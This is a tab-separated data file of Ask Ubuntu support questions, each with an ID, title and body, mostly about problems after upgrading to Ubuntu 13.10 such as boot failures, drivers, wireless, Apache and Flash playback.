361967	lost power during ubuntu 13.10 upgrade but everything works	i 've been upgrading my ubuntu to 13.10 and forgot to plug it into a power resource . just the second i entered the room to check on the upgrade i saw an unfinished installation and the moment it shut down . after rebooting everything seems to work normally , i checked the software update , it said everything is up to date . my computer information sais ubuntu 13.10 . i 'm sure the installation has n't finished ( the bar was near 3/4 to finish and my battery status was 0 % ) and do n't want to appear an error in the future . how can i continue the installation ? i ran these commands : sudo apt-get update sudo apt-get upgrade sudo do-release-upgrade sudo dpkg -- configure -a sudo apt-get dist-upgrade sudo apt-get install -f they said it 's all ok and up to date , no errors and no new release . there have been questions like this , but my problem is , that i do n't see any issue yet . suggestions much appreciated : )
361968	wrong video card driver loaded by the system fater updates . ubuntu 12.04	after installing updates in ubuntu 12.04 , system does not recognize my video driver ( ati radeon hd 5800 series ) . the system settings show vesa : cypress driver . my xorg.conf was cleared . i have reinstalled amd catalyst driver ; the xorg.conf was populated with some data but unfortunately , it did not help . is it possible to have a fix for it ? if not , how can i load the kernel that i had prior to updates . i attempted to move to the default video driver while troubleshooting , but my pc fans started spinning out of control . this malfunction causes lots of visual noise ( such as salt & pepper ) on my display . my pc processor : intel® core™ i7 cpu 930 @ 2.80ghz × 8 os type : 64-bit
361971	is steam available in ubuntu software center ?	after a fresh installation of ubuntu 13.10 i noticed that there was no steam in the ubuntu software center ! well , that 's mot a problem since steam can be installed through the deb file on their website . however , just out of curiosity , i would like to know if it will be available in the software center anytime soon !
361974	connecting to ant+ usb	i have successfully installed the packages as excellently suggested by mitch on the following question ubuntu 13.04 and garmin 405 ant+ but still ca n't download data from the garmin via the ant+ usb device . is there a step by step guide to run the software and enable the data transfer to a .tcx file please ? is it done from the terminal ? the output from lsusb is as follows for the ant+ usb stick . bus 002 device 006 : id 0fcf:1008 dynastream innovations , inc .
361975	tried installing ubuntu on a pc with windows 7 . ubuntu did not install properly and windows 7 wo n't boot . please help	i have been using windows 7 for many years , but wanted to learn more about ubuntu . so i used easeus partition manager to create a new partition on my hard drive . i then burned ubuntu 12.04 lts on to a cd , and booted ubuntu from the cd . after trying out ubuntu for a bit , i decided to install it . here is what i did : http : //imgur.com/a/vymq6 ( screenshots and descriptions of everything i did is given in the album above ) . ubuntu still works from `` live cd '' so i was able to copy my important files into a usb drive . all windows 7 files seems to be in tact as well . what can i do to get windows 7 working again ? my knowledge of how operating systems , and hard drives work is limited . i just a beginner to ubuntu as well ( i was installing it to learn more about it ) . so , any help would be really appreciated . thanks in advance .
361976	find files with a minimum filename length	i 'd like to find all files in a certain folder which have a filename of at least n characters ( extension included ) . is there any way to achieve this with find ?
361977	what 's the difference between `` software updater '' and `` software update ''	i noticed i have two versions of `` software update '' one just says open source in the description and the other says its gnome apt update manager . `` software updater '' if clicked finds no current updates . `` software update '' if clicked finds a dozen or so updates . ubuntu 13.10
361980	wireless power management now permanently on in 13.10	i updated to 13.10 yesterday and noticed that wireless power management is on permanently , effectively making my internet connection uselessly slow . i previously had edited /etc/rc.local and added iwconfig wlan0 power off to the end of the script so power management would be turned off . now , even if i run wlan0 power off in the terminal i get the following error : error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not permitted . this operation was `` permitted '' in 13.04 and worked great , i 'm regretting updating as i finally had everything working great . guess i 've learned my lesson with updates now ! fyi i have a samsung series 5 ultra notebook . thanks for your help .
361981	error : file '/boot/grub/i386-pc/normal.mod ' not found	i have xubuntu in a computer at the moment , but i want to put windows 7 on it . so when i try to boot either windows 7 or windows xp , i get this error . what is going on ? why do i get ubuntu error when trying to put up windows ?
361982	problem during ubuntu 13.10 installation	i was upgrading from ubuntu 13.04 to 13.10 and during the installation alt + tab was not working . downloading packages was over . during setting up , i minimised the terminal and after that i could not see the terminal again . launcher was not working . system remained idle for some time . i shut it down by using power button . now , when i restarted the system , symptoms : login screen said that i am using ubuntu 13.10 for sometime after logging in , the screen flashed alt+ tab is not working , launcher is also not working if i minimise any window , i can not open it again whenever i run firefox , gvim using terminal , their gui is ok but terminal outputs some errors there is no network symbol , date etc . system is working slow . system is emitting lot of heat even when only firefox runs . no data loss during updating . ubuntu selection screen shows both ubuntu and windows 8 , but in nautilus , windows drives are not shown . is there any solution to this problem ? i tried running sudo dpkg -- configure -a , but it did n't solve the problem completely and created new problems . now , after restart , my keyboard input is in devanagari and not in english .
361988	why do we need to be root in terminal for shutdown and restart ?	when we install/remove/update packages or make any changes which require administrative privileges we are prompted for the password of admin user who has the sudo privileges - this happens both via gui and terminal . however , if we try to shutdown and restart via terminal , it complains that we need to be root : $ reboot reboot : need to be root $ shutdown now shutdown : need to be root but we are never asked for a password when we perform these actions via the cog-wheel at top right . why is there this discrepancy ?
361990	installing software in recovery mode	for some reason i can only successfully boot into recovery mode . i want to install drivers software updates , etc . my question is . if i install these software in recovery mode will they be applies like they normally would in the normal ( non-recovery ) ?
361991	problems with networking after suspend	i have some problems on my asus notebook since i upgraded to ubuntu 13.10 : networking ( wifi and lan ) wo n't work after resume from suspend . i 've seen many posts about this but they would n't work for me ( adding iwlwifi to the list of loaded modules ) . i could n't find anything on that problem , and i donât know where to look at to solve that . is there any information i can add ?
361992	ca n't install ubuntu on fujitsu siemens m52212	please help me to install ubuntu 12.04 or 13.10 on fujitsu siemens m52212 . i tried to do it by downloading iso files ( ubuntu-12.04.3-desktop-i386.iso and ubuntu-13.10-desktop-i386.iso ) from the official website . then i burned the first one into a dvd . installation began ( the logo appeared ) and failed with the black screen and inactivity of all drives . so i turned the laptop off . i decided to check the checksums of my iso files . they were identical to the ones from the ubuntuhashes pages . i tried to make a bootable ubuntu flash drive using this and that creator . using two different usb drives and two different computers ( running windows 7 and windows 8 ) in most of possible combinations . each time i tried to install ubuntu on the laptop , and the installation failed in the same way as with the dvd . and after installations i rerun the laptop and checked my usb for errors . and it found : check finished : errors found in 1 files . then i made the same check on another laptop , and it returned the same error . the same effect is if i try to load or check for errors on the dvd . what am i doing wrong ?
361993	network connection problem with wicd on macbook pro 7.1	i installed minimal ubuntu with xfce on macbook pro 7.1 . i installed wicd . when the computer boot , it asks for password , when i enter the password , it says : `` could not connect to wicd 's d-bus interface . check the wicd log for error messages . '' network-manager also installed automatically ( i suppose during the 13.10 upgrading ) . i can connect with network manager to wpa wireless connections , but can not see wpa2 connections ( i have wpa2 connection at home ) .i looked at wicd configuration file but it was empty . my question : how can i make wicd able to work ?
362002	why are my software sources debian instead of ubuntu	as you can see the tab reads debian software when it should read ubuntu software . i am using 12.04 lts . i used the same cd to install lts on my laptop and it says ubuntu software like it should . how can i fix this ?
362005	why do i have the ubuntu os although i uninstalled it ?	when booting my pc with windows 8 as my main os , my computer shows me two operating systems to boot either i uninstalled ubuntu . i also can´t uninstall ubuntu anymore and if i install a new ubuntu again there are two `` ubuntu '' options when choosing my os , but only one of it works . i´d really prefer to have one working ubuntu system or no ubuntu os . how can i delete the not working ubuntu ? sorry for mistakes i´m from austria .
362007	replace lightdm with mdm on ubuntu 13.10	i 'm trying to replace lighdm with mdm on ubuntu 13.10 , but there already is package in ubuntu sources called mdm . it 's not display manager , but `` the middleman system '' ... so the ppa install does n't work . i tried installing .deb package and it changed login screen , but gave me an error message after login and then x stopped . i had to revert back ... any ideas on how to install mdm on ubuntu 13.10 ... ? ? ?
362009	how i can install build-essential in a pc without internet connection ?	i need to download that package from another pc with internet and after install it on the linux pc . there 's any way ? thanks !
362014	how can i install amd catalyst control center on ubuntu ?	i 've had it with vista when it came with my pc . i currently have the 4800 series , i 've tried looking through the amd website but everything seems to be vague and confusing . is there a definitive place where i can download+ install it onto this os ?
362016	how to remove ubuntu to install windows 7	i had 12.04 installed but want to go back to windows 7 . after formatting my drive i am presented with the message system not found even when booting from a cd . i could not even reinstall ubuntu with this error .
362018	how to run 32bit eclipse ( odev ) on 64 bit ubuntu 13.04	how to run 32bit eclipse ( odev ) on 64 bit ubuntu 13.04 ? problem is 64 bit version of odev preconfigured eclipse does not exists ... . so i have to use 32bit one which doesnât start on u64 bit . eclipse.buildid=m20110210-1200 java.version=1.7.0_25 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_ca framework arguments : -product org.eclipse.epp.package.cpp.product command-line arguments : -os linux -ws gtk -arch x86 -product org.eclipse.epp.package.cpp.product ! entry org.eclipse.osgi 4 0 2013-10-19 14:13:18.526 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : can not load 32-bit swt libraries on 64-bit jvm at org.eclipse.swt.internal.library.loadlibrary ( library.java:197 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:174 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) i have whatever default jre installed via ubuntu software center ... . i assume it is 64bit - openjdk java 7 runtime and if i wont figure this out , installation of ubuntu on my laptop is doomed ... . to much hassle with everything ... : (
362021	open file or application as root from gui	is it possible to open a file or application as root from the gui ? my ideal would be right-clicking on a file or an application and seeing an `` open as root '' choice in the context menu , after which i was asked for my root password . somewhat related to this is the ability to allow , for example , a save to take place where originally you had not opened the application as root ( e.g. , modifying a .conf file in /etc )
362025	ubuntu 13.10 ca n't type in unity dash	i just installed ubuntu 13.10 and i ca n't type in the unity dash field . my keyboard works on all other applications .
362026	can not boot after ubuntu 13.10 install on uefi machine	my ultimate goal is to get ubuntu working on my new sony vaio pro 13 , a haswell ultrabook . the hardware seems to be well-supported as i can boot a livecd and use the system fully for as long as i wish . the sony vaio pro 13 has a uefi bios and seems to be tightly integrated with the windows 8 which it came preinstalled with . i have tried multiple ways of installing ubuntu 13.10 and none get me to a point where i can boot my machine into ubuntu . when performing the installation with the bios turned to legacy mode , near the very end of the installation it crashes hard with a kernel panic ( `` not syncing : attempted to kill init ! '' ) . installation with uefi turned on ( secure boot turned off ) succeeds perfectly . however , upon rebooting i simply receive a bios screen saying that the vaio could not boot windows . switching to legacy mode nets me an 'operating system not found ' error . as far as i can tell , the bios on this machine has absolutely no option to bring up a boot selection menu . when installing in legacy mode , the ubuntu installer recognizes that windows 8 is present and i asked it to install in a dual-boot configuration . when installing in uefi mode , the installer recognized the previously attempted ubuntu installation ( which failed with a kernel panic ) but did not mention windows 8 at all . i asked the installer to erase the prior ubuntu install and replace it . the install succeeded without issue , but left my system in a state where it can not boot to either ubuntu or windows 8 . i 'm not terribly concerned about preserving windows 8 , but i would like to be able to boot some os to use the machine ... right now i 'm just using the livecd which works perfectly . i 'm an experienced linux user and software developer , but i 'm not very familiar with the changes uefi brings with it . is there a way for me to check if grub is present on the disk ? is there a way to force reinstallation of it ?
362030	wireless not connecting on ubuntu 13.10 , toshiba satellite pro l 650	i have just installed ubuntu 13.10 on my toshiba satellite pro l650 . after several reboots , installing/ uninstalling the broadcom driver i still ca n't connect . it detects the wi fi signals and the icon flashes as if it 's trying to connect but never actually does . i 'm really quite rubbish with code and stuff , but i really like ubuntu as an os and would really appreciate any suggestions anyone can offer ! 02:00.0 ethernet controller : qualcomm atheros ar8151 v1.0 gigabit ethernet ( rev c0 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 )
362033	how to know what icon is being used in the dock ?	i want to replace the synaptic icon ( although it could be any other ) . i have found the desktop entry , icon theme and icon naming specifications that gnome follows ( somewhat ? ) , but even though i 've been reading for a while now , the time has come to ask . in /usr/share/applications there is `` synaptic package manager '' , and it contains icon=synaptic . now , i kinda guess that i maybe know that the dock uses the 48x48 size of icons , but when i put both `` synaptic.svg '' and `` synaptic.png '' ( because i do n't know how to figure out which extension is being looked for ) , even a plain `` synaptic '' in my 48x48 theme folder ( and others , and other themes ... etc , even using ~/.icons to be sure it gets looked up first ) , guess what ? the icon does n't change . not even after a lot of gtk-update-icon-cache whatevertheme both in usr/share/icons and in $ home/.icons i 'm a bit confused . it 's a freaking icon . i 've sudo find / -name `` *synaptic* '' ed and all , ( restart included ) , but i do n't see the icon that is actually being used . there must be something that i 'm missing ... so i turn to you . it ca n't be this crushingly impossible to find out what icon is being used . i 'm open to consider attaching debuggers and/or dissemblers if necessary ( that could be memorable ) , but i have made the decision that i 'm gon na change that icon . would you please help me , if you can ? i will thank you a lot . this is ubuntu 10.04 lts , the theme is `` elementary '' , and my computer is a pretty standard acer laptop .
362037	samsung 305u notebook touchpad not working in ubuntu 13.10	i just installed ubuntu 13.10 on my samsung 305u notebook . the problem is that the touchpad ( cursor and clicking ) does n't work , it does nothing . the only way to fix it is to plug an external mouse , which is n't the optimal . i already checked the system preferences and the touchpad is enabled . i used ubuntu 13.04 before , and it worked . then i installed linux mint and the touchpad stopped working , that 's way i installed 13.10 , but now it does n't work here either . i hope someone can help me .
362038	how do i get oblivion to stop crashing ?	i 'm using ubuntu distribution 12.04 and trying to run oblivion , i used playonlinux to install it to a virtual drive along with using wine . i think the problem is i have a bugged graphics card or something i 'm fairly new to linux just moved from windows . here is the bug report from playonlinux i believe . when i start it up on playonlinux , it shows a menu with the buttons , `` play , data files , options , elderscrolls.com , technical support , uninstall , and exit '' . [ 10/19/13 14:58:38 ] - running wine-1.7.4 oblivionlauncher.exe ( working directory : /home/tyler/.playonlinux/wineprefix/theelderscrolls4_oblivion/drive_c/program files/bethesda softworks/oblivion ) wine : configuration in '/home/tyler/.playonlinux//wineprefix/theelderscrolls4_oblivion ' has been updated . [ 10/19/13 14:59:02 ] - running wine-1.7.4 regedit ( working directory : /home/tyler/.playonlinux ) [ 10/19/13 14:59:02 ] - user modified something in the registry manually [ 10/19/13 15:02:24 ] - running wine-1.7.4 oblivionlauncher.exe ( working directory : /home/tyler/.playonlinux/wineprefix/theelderscrolls4_oblivion/drive_c/program files/bethesda softworks/oblivion ) [ 10/19/13 15:18:56 ] - running wine-1.7.4 oblivionlauncher.exe ( working directory : /home/tyler/.playonlinux/wineprefix/theelderscrolls4_oblivion/drive_c/program files/bethesda softworks/oblivion ) [ 10/19/13 15:19:15 ] - running wine-1.7.4 oblivionlauncher.exe ( working directory : /home/tyler/.playonlinux/wineprefix/theelderscrolls4_oblivion/drive_c/program files/bethesda softworks/oblivion ) err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded fixme : d3d : wined3d_guess_card no card selector available for card vendor 0000 ( using gl_renderer `` gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) '' ) . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32f328,0x00000000 ) , stub ! fixme : d3d : wined3d_guess_card no card selector available for card vendor 0000 ( using gl_renderer `` gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) '' ) . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33ef28,0x00000000 ) , stub ! fixme : d3d : wined3d_guess_card no card selector available for card vendor 0000 ( using gl_renderer `` gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) '' ) . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33eef8,0x00000000 ) , stub ! fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : state_zenable z buffer disabled , but arb_depth_clamp is n't supported .
362040	good approaches to animating over video	i want to superimpose an animated character over a video clip . i want to manually draw each frame for the animated character and do this with reference to each frame of the video clip ( which does not feature a stationary scene ) . what procedures and programs would you recommend to accomplish this ? to be more specific , i have in mind something such as the following : i import the video clip into a program and this produces a set of frames from the clip on a timeline . for each frame in this timeline , i can draw the animated character on a layer above the video frames layer . an interface such as that seen in the program pencil is close to what i 'm looking for ( in which i can draw a new frame of the character with reference to the previous frame of the character ) . i should emphasise that the video clip is of such a length that it would be too laborious to convert the video clip into a set of images and import each frame image 'by hand ' . anyway , what do you think ? is there some reasonable way to accomplish this ? thanks !
362041	problem setting keyboard shortcuts after upgrade to saucy	after upgrading from ubuntu raring to saucy , the new keyboard applet changed my keyboard shortcut for cycling between keyboard layouts to super+space , but this new shortcut does n't do anything . when trying to set my old shortcut ( shift+caps lock ) , it interprets that as mod4+super+hyper+space . is this a know problem , and is there any way i can get my old shortcut back ? i need to cycle between 3 different keyboard layouts frequently ( sometimes several times an hour ) , so having to use the mouse for this is a major regression in my work flow .
362043	looking for monitoring softwares for webserver	i am looking for tools to monitor my ubuntu 12.04 lts web server . i am interested in being notified when suspicious activities are detected . for instance , when postifx sends more than a given amount of e-mails in a given period of time ( it means that the server has been compromised and turned in an emailing platform ) , or for any other suspicious activity . i am mainly looking for suggestions and pointers . thanks .
362045	how to get ubuntu 13.10 installer to recognize windows ' existence ?	saw you posted this question , and comment : 13.10 and 12.04 discs say i have no windows 7 on my hard drive ca n't get it to work ; similar problem . you wrote : `` i was able to find a fix . the problem was related to a gpt partition table . deleting it and running the ubuntu installer again worked in detecting windows 7 this time . '' could you please elaborate , here or in a public answer ? would be much appreciated . thanks , james cropcho
362049	location-independent media player	are there any linux media players that are self contained ? tar 's ? ( libraries , codecs ( if this is even a linux concept ) linked to a relative location ) , to be used on a system without a package manager , or similar system installed ? i often use a customised ubuntu livecd ( that has a broken rhythmbox install on , and i have lost the source to recreate ) on different computers , and thought it would be easier to have the media player on a flash drive , instead of having to ( presumably ) install this other one on the tmpfs , or perform ( after i figure out what is wrong ) adjustments to the tmpfs to get the existing media player install running as expected , after each startup .
362050	why are there two configuration files / areas for smb / samba ?	why are there two places that samba shares may be configured in ubuntu ? i 'm running ubuntu 12.10 desktop and noticed that the gui-based share configuration program sets up shares in the /var/lib/samba/usershares directory the man pages and most how-to websites say the correct place to configure samba shares is in the /etc/samba/smb.conf file . what 's the difference ? why are both available , and why does the included ubuntu gui app preferentially use the /var/lib area instead of /etc/samba for configuration ? is there a difference in security or reliability ?
362051	ubuntu start menu shutdown/restart have the same function	i am using ubuntu 13.10 . after upgrading and fixing some things the one thing i can not fix is that the start menu lists shutdown and restart and both these buttons just open a menu with shutdown and restart as options . previously on 13.04 only shutdown was present and it opened the same menu .
362056	instalation of ubuntu touch in defy plus , 'adb shell getprop ro.cm.device ' returned non-zero exit status 255	i try to install ubuntu on a motorola defy plus , but i do not recognize the device , both in the facility or in the device unlock . [ licencing warning and precautions ] do you accept ? [ yes|no ] yes error : device not found error : phablet-flash : command 'adb shell getprop ro.cm.device ' returned non-zero exit status 255
362058	why ctrl+shift+alt+down wo n't move a window one workspace down in 13.10	i tried to move a window one workspace down using the ctrl+shift+alt+down keyboard shortcut . it did n't work . i could get it to go left and right , but not down . how can i fix this ? it seems the down arrow does not work at all ( unless if i am in a word processor or internet browser ) .
362062	dual boot ubuntu 12.04 lts invisible after installation	i followed your instructions for installation from usb stick . first , i tried it as a desktop , liked it , and so followed your instructions and illustrations to install on my win7 laptop . it took a while but went very smoothly . finally , it told me to restart , and i did . problem 1 the restart took me straight to win7 , with no choice ( no bootloader ) to boot ubuntu . every subsequent boot takes me to win7 , no choice to boot ubuntu . i manually installed a bootloader , but it still takes me directly to win7 . the bootloader never shows up . problem 2 when i click on computer in win7 , there is no ubuntu partition . i installed it twice , noting that the step partitioning my hard drive to make room for ubuntu completed both times , but after an hour , computer still tells me there is no ubuntu on my laptop . why is in invisible , and why does n't the bootloader detect it after two lengthy installations ?
362063	machine check error when booting from usb	i am trying to install 13.10 . i have created a startup usb with the built-in startup disk creator and i have also tried using unetbootin , both give me this error on boot-up , just a black screen with the message `` machine check error '' . i am using an asus zenbook ux31 . it is working fine otherwise , and i have boot from usb without problems with other versions of ubuntu several times before . i have seen this duplicate but the accepted answer there is a workaround , not a solution - i can not boot from cd because i am using an ultrabook without any cd drive .
362066	`` unable to locate mail spool file . '' when using thunderbird and gmail	i am using ubuntu 13.04 and i set my gmail account as default outgoing server . when i press get mail in thunderbird i get the message '' unable to locate mail spool file '' . any suggestions . also how do i get the terminal ?
362067	is it normal for grub to take some time ( 15+s ) after i choose what to boot ?	i had been planning to change the background of my bootloader for a while , and finally got to it . now the black screen i get for quite some time was made clear . it is still grub , because the background image stays , while all of the text is gone . then it just simply shows the lubuntu loading screen for , usually , not more than 3 seconds . i run lubuntu 12.10 . my question is , is this normal behaviour or is something going wrong , causing grub to take longer ? here are the contents of my grub file located at /etc/default/ : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=5 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' grub_background= '' /usr/share/lubuntu/wallpapers/1210-windmill_by_ferran_reyes.png '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' if you need any other information please tell me and i 'll do my best to provide it . : )
362068	ubuntu tweak caused problems - perhaps ? cinnamon	i am running 12.04 on my hp 530 laptop and using cinnamon as my gui . i heard about tweak and decided to try it earlier this week . all appeared well - then i started having problems . first i lost icon images from the left side of the menu then i noticed the mousepad refused to use double tap to click ( i got this back by resetting option ) . tonight i find that i can not type into the terminal window but can paste . anyone know what is going on ?
362071	how to prevent pdf from opening on previously-viewed page ?	when i open a pdf it goes to the page that i last visited . how can i prevent this so that whenever i open a pdf it goes to page 1 ? i am using document viewer 3.4.0 and okular 0.14.3 . thanks !
362073	how do i resize a partition to make more room in the root	i am upgrading to 13.10 and discovered my root partition was too small . i used partition editor to shrink my home partition by 2gb . now i want to take the unallocated space and add it to sda1 . i ca n't figure out how to accomplish this . see image thanks , ilan
362077	graphics dont work after installing 13.10 on hp pavillion 15	when rebooting following a `` successful '' installation a message `` the system is running in low-graphics mode '' displays . i click on ok and accepts the suggestion to run in low graphics mode for one session . the next message is `` stand by one minute while display restarts '' . nothing happens until i click ok . the screen become all black with a blinking cursor in the upper left corner . the computer stops there . ctrl-alt-delete restarts and the same sequence repeats . selecting exit to console login also results in black screen and blinking cursor . trying out ubuntu without installing will not work with the same result .
362079	is there any way for me to be able to get my surround back to my g930 headset ?	i have a logitech g930 headset . i recently decided to go 100 % full on ubuntu , and i am loving it so far . however , this is sadly the only thing i 've hit a brick wall with . i have googled ways to find drivers for the logitech g930 or get logitech gaming software to work . normally this would not be a issue , but when you have surround turned off on the logitech g930 it sounds plastic and horrible . is there any way to get this to work ? best regards , marco .
362081	two monitors when only having one in 13.10	i just did a fresh install of ubuntu 13.10 64bit , and it says that i have 2 monitors , when i actually only have one i have a dell xps 15 with nvidia graphics card if that helps in anyway
362082	php is not working well on ubuntu 13.10 and mcrypt is missing in phpmyadmin	i 've upgraded from ubuntu 13.04 to 13.10 but i can not work with php pages or phpmyadmin . i 've tried this way to install lamp on ubuntu sudo apt-get install lamp-server^ phpmyadmin and i 've done all of the configuration correctly after installation i 've added this line include /etc/phpmyadmin/apache.conf to /etc/apache2/apache2.conf then i restarted apache2 now i have two problems : in phpmyadmin on the bottom of the page is this error : the mcrypt extension is missing . please check your php configuration i 've check and mcrypt was in it , but in phpmyadmin it gives me error of missing . the other problem is on php pages it seems like there is no php and it 's all html because lots of php lines are printed in textbox 's like : < ? echo $ row [ 'details ' ] ; ? > can anybody tell me what should i do ?
362087	apache virtualhosts no longer working after update to 13.10	i updated my kubuntu to 13.10 today and my virtualhosts that worked perfectly before are no longer working . the s2ensite and a2dissite commands claim `` site xxxxxx does not exists '' even the files are in sites-aviable and were in sites-enabled i tryed to remove them from sites-enabled and then enable them again , but still apache claims they would not exists . here is one of my virtualhosts . they are basically all like this . < virtualhost *:80 > serveradmin webmaster @ localhost servername expsite.local documentroot /var/www/expsite/htdocs < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/expsite/htdocs/ > options indexes followsymlinks multiviews allowoverride fileinfo order allow , deny allow from all < /directory > # scriptalias /cgi-bin/ /usr/lib/cgi-bin/ # < directory `` /usr/lib/cgi-bin '' > # allowoverride none # options +execcgi -multiviews +symlinksifownermatch # order allow , deny # allow from all # < /directory > customlog /var/www/expsite/logs/access.log combined errorlog /var/www/expsite/logs/error.log loglevel warn # alias /doc/ `` /usr/share/doc/ '' # < directory `` /usr/share/doc/ '' > # options indexes multiviews followsymlinks # allowoverride none # order deny , allow # deny from all # allow from 127.0.0.0/255.0.0.0 : :1/128 # < /directory > < /virtualhost > the 000-default is working and i can enable and disable it .
362089	why does a kubuntu install require libunity9 ?	i have kubuntu 13.10 installed on my system . after apt-get update this morning , i was informed that the following packages will be upgraded : libgudev-1.0-0 libpam-systemd libsystemd-daemon0 libsystemd-login0 libudev1 libudev1 : i386 libunity-protocol-private0 libunity-scopes-json-def-desktop libunity9 systemd-services udev i was surprised by the references to unity on my system , since ( afaik ) i do n't have it installed . $ apt-cache show libunity9 ... binding to get places into the launcher - shared library libunity is a shared library to be able to interact with the launcher and add places in unity environment . why do i have unity components installed in my kubuntu system ?
362090	blank desktop after upgrade	just upgraded to 13.10 , no desktop icons/menu , just the wallpaper . i 've tried : sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo reboot sudo apt-get upgrade sudo apt-get dist-upgrade
362092	lightdm active user indication removed	just updated to 13.10 and i notice the lightdm sign in screen on a multi-user system no longer indicates which users are already logged in . previously active users were listed in bold text .
362093	unity environment way too slow in ubuntu 13.10	unity and its apps open too slowly whenever i open one . it takes a while for them to appear completely . everything works properly when the window is already open . the biggest problem is with the dash : it 's so slow when i 'm looking for an app although i have removed some lenses . what should i do or what can i do ? these issues only occur with ubuntu 13.04 and 13.10 whereas 12.04 works amazngly but i have issues when updating a package or installing a new one , that 's why i do n't opt for that one . specifications : ram : 2gb , processor : intel® atom™ cpu n2600 @ 1.60ghz × 4 , graphics card : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits )
362094	configuring arandr	i just recently installed arandr and have been trying to get a decent configuration to use for a spanning monitor display using my external monitor and my laptop monitor . however i have a few questions . first off , right now my ubuntu toolbar is on my laptop monitor . how can i transfer it so that it is on my external monitor ? also , how can i save my desired configuration layout so that whenever i plug in my external monitor ( via a vga input ) it immediately loads my desired layout ? thanks for the help !
362097	mouse on screen lags	i just made a fresh install of ubuntu 13.10 64bit on my dell xps 15 laptop . my mouse lags/glitches/blinks each time something is loading in ubuntu . when a youtube video is playing in the background it blinks all the time , and it also blinks for each character that i write , it 's very annoying . it also blinks for each time the blinking cursor in a text field blinks . when i have just booted up my laptop it can be away for a second or more ( than after it comes back it goes away for a second or more and this happends for awhile ) , so i have no chance of seeing the mouse on my screen .
362099	my internet goes down after a while	the problem is that the internet goes down after a while , i can connect perfectly when i first turn on my netbook but after a while it disconects and keeps trying to reconect but never gets it . now , im completely new in ubuntu , y merely know a few commands for the terminal and im not sure what info do you need from me to help ... all i know is that the wi-fi is failind on ubuntu but not in windows 7 ( in the sane netbook )
362100	hspice : after `` hspice mosfet.sp '' , the `` scope '' does n't work ! ! ! it has no gui ! ! !	after all the simulations , and the result shows that the `` hspice '' works , but when i try to use `` scope '' to view the waveform , the terminal shows nothing . please help me ... ..
362101	accidentaly deleted /etc/x11/xorg.conf.original , and now log in no longer works	i accidentally deleted xorg.conf.original-0 ; xorg.conf.fglrx xorg.conf.fglrx-0-1 , after i tried to install fglrx drivers on the graphics card , which in fact worked on 13.04 and now as i went to 13.10 has not worked . now i can just switch to a new tty with : ctrl + alt + f2 i found this which is for nvidia cards to install the fglrx drivers for graphic card i used this tutorial is there any possibility that i can recover , replace , rebuilb that xorg.conf.original-0 , and if exists any possibility where i could start from .
362104	gnome 3.10 does n't show login , ubuntu 13.10	i use gnome as default desktop . and i recently upgrade ubuntu to 13.10 then upgraded gnome to 3.10 . upon restarting , it brings me to the gnome log in screen ( gdm ) and all i see is the top banner part so like your date , music volume , option to restart , suspend or shutdown . hitting ctrl+alt+delete tells me gnome display manager will log out - it does but still nothing . i am on the log in screen , but there is no user to select , like there normally is or was . i can boot into safe mode and drop down to shell but i am not sure what commands i would enter to get the login screen back . i am using the gnome ppa 's and the `` unstable '' ppa , so i expected issues , but not this - ideas ?
362107	running command on start up	i have a series of 'sudo ' commands that i have to run on terminal everytime i boot up my system so that my touchpad is use-able . is there some file that i can configure so that these commands run immediately when i boot up without me having to manually input them ? thanks for the help !
362108	unable to use hp deskjet 1010 drivers	i 'm trying to install hp deskjet 1010 printer , i ca n't use the cd that come with the printer , i do n't now how i can run it . i ca n't download driver directly from hp page , and the ubuntu system do n't find the drivers . please help me .
362111	protected videos not playing ubuntu 13.10 ( amazon prime )	i am unable to play amazon prime videos with the chrome/firefox browser . i 've tried deleting the flash folder and re-installed the os . ubuntu 13.10 flash version : flashplugin-installer 11.2.202.310ubuntu1 youtube works but not amazon prime . try 1 : clear cache flash cd ~/.adobe/flash_player rm -rf nativecache assetcache apsprivatedata2 try 2 : install older version of flash /usr/lib/flashplugin-installer/flashplayer.so some other sites have installing hal and running hald but that was not working either as it seems to be a deprecated . sudo apt-get install hal
